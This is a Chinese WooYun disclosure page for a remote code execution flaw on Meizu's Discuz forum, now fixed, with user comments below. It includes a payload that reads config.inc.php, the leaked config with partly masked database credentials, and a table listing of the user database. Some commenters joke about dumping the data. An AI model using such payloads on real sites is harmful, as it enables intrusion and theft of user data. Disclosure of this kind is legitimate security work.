当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080884

漏洞标题:魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

相关厂商:魅族科技

漏洞作者: 猪猪侠

提交时间:2014-10-26 18:05

修复时间:2014-12-01 10:06

公开时间:2014-12-01 10:06

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商已经确认,细节仅向厂商公开
2014-11-05: 细节向核心白帽子及相关领域专家公开
2014-11-15: 细节向普通白帽子公开
2014-11-25: 细节向实习白帽子公开
2014-12-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

魅族科技某分站远程代码执行漏洞(千万用户信息受影响)

详细说明:

影响网站:
http://forum.meizu.com/
Disucz ucenter 用户将近1000万


mask 区域 
*****^^^*****
1.http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt


meizu.png

漏洞证明:

meizu_cmd.png


cmd=echo readfile('./config.inc.php');

<?php
//UTF8转码
/*
	[Discuz!] (C)2001-2006 Comsenz Inc.
	This is NOT a freeware, use is subject to license terms
	$RCSfile: config5.inc.php,v $
	$Revision: 1.9 $
	$Date: 2007/01/26 01:11:32 $ 
*/
// [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商
	$dbhost = '192.168.**.**';			// 数据库服务器
	$dbuser = 'meizu_**bbs';			// 数据库用户名
	$dbpw = 'wdw5NR*****aAhW';				// 数据库密码
	$dbname = 'meizu_enbbs';			// 数据库名
	$pconnect = 0;				// 数据库持久连接 0=关闭, 1=打开
// [CH] 如您对 cookie 作用范围有特殊要求, 或论坛登录不正常, 请修改下面变量, 否则请保持默认
	$cookiepre = 'dZJ_';			// cookie 前缀
	$cookiedomain = ''; 			// cookie 作用域
	$cookiepath = '/';			// cookie 作用路径
// [CH] 论坛投入使用后不能修改的变量
	$tablepre = 'cdb_';   			// 表名前缀, 同一数据库安装多个论坛请修改此处
// [CH] 小心修改以下变量, 否则可能导致论坛无法正常使用
	$database = 'mysql';			// 论坛数据库类型,请勿修改
	$dbcharset = '';			// MySQL 字符集, 可选 'gbk', 'big5', 'utf8', 'latin1', 留空为按照论坛字符集设定
	$charset = 'utf-8';			// 论坛页面默认字符集, 可选 'gbk', 'big5', 'utf-8'
	$headercharset = 0;			// 强制论坛页面使用默认字符集,可避免部分服务器空间页面出现乱码,一般无需开启。 0=关闭 1= 开启
	$tplrefresh = 1;			// 论坛风格模板自动刷新开关 0=关闭, 1=打开。
	
// [CH] 论坛安全设置, 调整以下设置,可以增强论坛的安全性能和防御性能
	$adminemail = 'bbs@meizu.com';		// 系统管理员 Email


[SHOW TABLES FROM `meizu_user`]
--------------------	-	
Tables_in_meizu_user	|	
--------------------	-	
TMP_VCH_02bea2a76c1f4f2491ae58252cbcfc71875	|	
TMP_VCH_0952588bd0904304a66e5db830d70853224	|	
TMP_VCH_131a1deb65bf4ab0b75dff6fa00c71c6923	|	
TMP_VCH_2ee3064b952241e694fcc5704dd37c286	|	
TMP_VCH_31ef36f285804af7a48bb939d7cc93a4544	|	
TMP_VCH_326901080e2d4cf8a85586e29f41f18065	|	
TMP_VCH_3cbe635e43be490296dbdc769d9e6774657	|	
TMP_VCH_3fcd7a5ee099423ba2383f459c8e0e98744	|	
TMP_VCH_530da630629843f6acd070b435bc7045572	|	
TMP_VCH_6fb938aba3ac4d34a3b156eefd6e7805262	|	
TMP_VCH_8a33e169514241ed9c8abbd76733b55a187	|	
TMP_VCH_8aae9628d37f44c785090f0a67e3a16f692	|	
TMP_VCH_9077238e556a4a068d54a5aee0b5113b846	|	
TMP_VCH_a28ce46669ef4c89b0eecd23c0cca09d778	|	
TMP_VCH_a58b7ec518b443048d0ffce7efdc3e0b311	|	
TMP_VCH_b84f960d9531447196fae440b2207791691	|	
TMP_VCH_bdfb1492eba54967a1c5ef6e09a44424884	|	
TMP_VCH_d02e1d2e1f8c4c819931ce72a4d3c571927	|	
TMP_VCH_d7b21c017ff4415cb8c584d524cf3498975	|	
T_APP_PRODUCT_ORDER	|	
T_AUTH_GRANT	|	
T_AUTH_OAUTH	|	
T_AUTH_RESOURCE	|	
T_AUTH_ROLE	|	
T_AUTH_ROLE_RESOURCE	|	
T_AUTH_USER	|	
T_BBS_DONATE_PERSON	|	
T_BBS_TITLE_INFO	|	
T_BS_BASEDATA	|	
T_BS_BASEDATA_LANG	|	
T_BS_BASEDATA_TYPE	|	
T_BS_GENERATECODE	|	
T_BS_GENERATECODE_LAST	|	
T_BS_IDENTITY	|	
T_BS_LOG	|	
T_BS_LOGINFAIL	|	
T_BS_LOGIN_URL	|	
T_BS_PARAMETER	|	
T_BS_PUSH_ROUTER	|	
T_BS_PWDKEY	|	
T_BS_REFERBD	|	
T_FNBL_CATEGORY	|	
T_UC_ACCOUNT	|	
T_UC_ACCOUNT_bak	|	
T_UC_BAL_0424	|	
T_UC_BAL_CHANGE_0424	|	
T_UC_BILL	|	
T_UC_BILL_LOSTDATA_0424	|	
T_UC_CHECKACCOUT_0424	|	
T_UC_DONATE_0424	|	
T_UC_LOGIN_VALIDCODE	|	
T_UC_MEMBERS_ACTIVE	|	
T_UC_MEMBERS_EXT	|	
T_UC_MEMBERS_MODIFY_ACTIVED_EMAIL	|	
T_UC_MEMBERS_VERIFICATION_CODE	|	
T_UC_MEMBER_DONATE	|	
T_UC_MEMBER_SN	|	
T_UC_MEMBER_SN_TMP	|	
T_UC_PAYMENT	|	
T_UC_PAYMENT_0424	|	
T_UC_PAYMENT_APPEAL_0424	|	
T_UC_PAYMENT_TEMP_0424	|	
T_UC_PAYMENT_tmp	|	
T_UC_TICKET	|	
T_UC_USER_BAL	|	
T_UC_VOUCHER_ENTRY_LOSTDATA	|	
T_UC_VOUCHER_ENTRY_tmp	|	
admin	|	
all_sn_1_tmp	|	
all_sn_2_tmp	|	
exists_sn_tmp	|	
exists_sn_tmp2	|	
imsi_card	|	
meizu_device	|	
no_exists_sn_tmp	|	
no_exists_sn_tmp2	|	
not_update_id_tmp	|	
online_meizu_device	|	
online_meizu_device_20140630_bak	|	
online_meizu_device_20140710_bak	|	
online_meizu_device_BAK_0711	|	
to_delete_id_tmp	|	
uc_admins	|	
uc_applications	|	
uc_badwords	|	
uc_create_members	|	
uc_domains	|	
uc_events	|	
uc_failedlogins	|	
uc_feeds	|	
uc_friends	|	
uc_mailqueue	|	
uc_memberfields	|	
uc_members	|	
uc_mergemembers	|	
uc_newpm	|	
uc_notelist	|	
uc_pm_indexes	|	
uc_pm_lists	|	
uc_pm_members	|	
uc_pm_messages_0	|	
uc_pm_messages_1	|	
uc_pm_messages_2	|	
uc_pm_messages_3	|	
uc_pm_messages_4	|	
uc_pm_messages_5	|	
uc_pm_messages_6	|	
uc_pm_messages_7	|	
uc_pm_messages_8	|	
uc_pm_messages_9	|	
uc_pms	|	
uc_protectedmembers	|	
uc_settings	|	
uc_sqlcache	|	
uc_tags	|	
uc_user_answer	|	
uc_user_setting	|	
uc_vars	|	
user_nickname_locus	|


修复方案:

更改php.ini
设置: request_order为GPC

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-26 18:35

厂商回复:

厂商正在处理

最新状态:

2014-12-01:此漏洞已修复。

漏洞评价:

评论

  1. 2014-10-26 18:06 | 郭斯特 ( 普通白帽子 | Rank:181 漏洞数:69 | GhostWin)

    一楼?

  2. 2014-10-26 18:08 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    地板……爽。

  3. 2014-10-26 18:08 | 咖啡 ( 实习白帽子 | Rank:48 漏洞数:20 )

    二楼?

  4. 2014-10-26 18:11 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    三楼?

  5. 2014-10-26 18:16 | 安然意境 ( 普通白帽子 | Rank:189 漏洞数:79 | 无论是你的事业还是你的个人,可能走的过程...)

    五楼。

  6. 2014-10-26 18:19 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    一亿九万四十五楼

  7. 2014-10-26 18:24 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    前排

  8. 2014-10-26 18:36 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    就5RANK?

  9. 2014-10-26 18:40 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @子非海绵宝宝 是的,如你所见,所有用户的信息+手机信息只值5RANK

  10. 2014-10-26 18:43 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @猪猪侠 @魅族科技 其实我觉得并不是认为给的少 按照比例1:10其实也就100多块钱 并不是缺这个钱 而是白帽子的努力得不到肯定

  11. 2014-10-26 18:54 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

    下次拔裤子。。。。

  12. 2014-10-26 20:42 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

    自己利用可好? 魅族很坑人 屏幕坏了要600RMB修 操。 都可以换个新的了。

  13. 2014-10-26 20:43 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

    @猪猪侠 脱裤好吗 猪哥

  14. 2014-10-26 21:40 | 酸奶、 ( 普通白帽子 | Rank:182 漏洞数:27 )

    煤油飘过。不过说实话,rank的确少。

  15. 2014-10-26 22:19 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    猪猪侠,光一次腚吧。总见裤子不见腚,干过瘾啊。

  16. 2014-10-26 23:42 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @猪猪侠 5rank,50块。也就是说魅族几千万用户(应该是几千万吧,没去核实过)的数据才值50块,那么一条就是1W条数据大概1分钱左右,哈哈、、、

  17. 2014-10-27 09:31 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    是ROS吧?

  18. 2014-10-27 11:37 | papaver ( 普通白帽子 | Rank:197 漏洞数:35 | 95后,高一学生一枚... 萌萌哒..)

    哈哈 魅族果然 。。。

  19. 2014-10-27 11:40 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子,温润如玉)

    安全的悲哀

  20. 2014-10-27 19:01 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    猪猪侠去小米了??

  21. 2014-10-27 23:57 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    这厂商太浮夸。!

  22. 2014-10-28 20:49 | leakless ( 路人 | Rank:6 漏洞数:3 | 今天我没吃药感觉自己萌萌哒~~)

    下次再有这情况直接发裤子。。遇到这种厂商也是服了。。

  23. 2014-10-28 20:49 | leakless ( 路人 | Rank:6 漏洞数:3 | 今天我没吃药感觉自己萌萌哒~~)

    下次再有这情况直接发裤子。。遇到这种厂商也是服了。。

  24. 2014-10-29 18:40 | Mixes ( 普通白帽子 | Rank:111 漏洞数:19 | :))

    @猪猪侠 因为库被脱了.

  25. 2014-11-08 22:59 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    楼上真相?

  26. 2014-11-26 10:19 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    @猪猪侠 魅族真大方

  27. 2014-12-01 11:03 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    魅族的节操呢??

  28. 2014-12-01 16:07 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)

    @猪猪侠 大神,这个漏洞是什么原理呢?

  29. 2014-12-07 13:00 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)

    @【|→上善若水】 http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt 参照这个

  30. 2014-12-07 22:54 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)

    @廷廷 thanks

  31. 2014-12-22 13:11 | Cpt.Tony ( 路人 | Rank:0 漏洞数:1 | 兴趣)

    QQ邮箱好评

  32. 2015-06-25 16:42 | 魅族科技(乌云厂商)

    @猪猪侠 非常感谢白帽子猪猪侠对魅族安全做出的贡献,我司安全部门刚刚成立不久,接管魅族厂商帐号之后,确实觉得之前的漏洞确认和评分不尽人意,特地申请了一批手机,一则感谢白帽子提供漏洞,二则反馈Wooyun社区,届时乌云管理员会联系你提供地址的,再次感谢您对魅族安全的关注。

  33. 2015-06-25 17:03 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @魅族科技 俺有么有?心不黑,求一个魅蓝note2电信版。

  34. 2015-06-25 17:12 | 魅族科技(乌云厂商)

    @px1624 赞助了几台给乌云市场,敬请关注。

  35. 2015-06-25 20:49 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @魅族科技 。。。还要买啊!?还以为是奖励给提交过魅族漏洞的白帽子呢

  36. 2015-06-25 22:13 | he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)

    @魅族科技 有点想去你们那边,能聊聊吗?